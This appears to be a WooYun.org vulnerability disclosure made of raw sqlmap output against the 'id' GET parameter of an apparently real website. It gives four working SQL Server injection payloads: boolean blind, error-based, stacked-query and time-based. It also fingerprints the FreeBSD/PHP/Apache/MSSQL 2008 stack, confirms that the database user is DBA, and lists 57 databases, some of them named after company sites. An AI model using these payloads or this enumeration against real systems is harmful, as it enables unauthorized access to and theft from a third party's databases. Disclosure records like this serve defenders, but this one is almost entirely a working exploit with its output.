WooYun.org

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=180' AND 6668=6668 AND 'QXCs'='QXCs
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=180' AND 2192=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (2192=2192) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(98)+CHAR(113))) AND 'qGqd'='qGqd
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=180';WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: id=180' WAITFOR DELAY '0:0:5'--
---
web server operating system: FreeBSD 7.1 or 6.4
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Microsoft SQL Server 2008

current database:    'globalweb'
current user is DBA:    True
available databases [57]:
[*] CRMAttachDB
[*] CRMCIPDB
[*] DBAssistant
[*] DEMO
[*] DSC_CHT
[*] DSC_ENG
[*] DSC_MALA
[*] DSC_VIET
[*] DSCLeader
[*] DSCRPT
[*] DSCSYS
[*] DSCSYSBK
[*] DSCSYSOLD
[*] EDW
[*] EFNETDB
[*] EFNETDBPDLOG
[*] EFNETSYS
[*] Europe
[*] globalweb
[*] globalweb_test
[*] JOYTECH
[*] KUNSHAN
[*] Leader
[*] master
[*] mdmDB
[*] model
[*] msdb
[*] PA
[*] PANTEC
[*] portal
[*] ReportServer
[*] ReportServerTempDB
[*] SFT_Europe
[*] SFT_JOYTECH
[*] SFT_KUNSHAN
[*] SFT_SHENMOT
[*] SFT_SHENZHEN
[*] SFT_TEST1
[*] SFT_TESTSHENZHEN
[*] SFTSYS
[*] SHENMOT
[*] SHENZHEN
[*] tempdb
[*] TEST1
[*] TESTSHENZHEN
[*] US
[*] V-POINT_AUD
[*] V-POINT_RPS
[*] WINDCHILL
[*] YJOYNOVA
[*] YNOVA
[*] YPRIMA
[*] YSINGA
[*] YTOY
[*] ZKUNSHAN
[*] ZSHENMOT
[*] ZSHENZHEN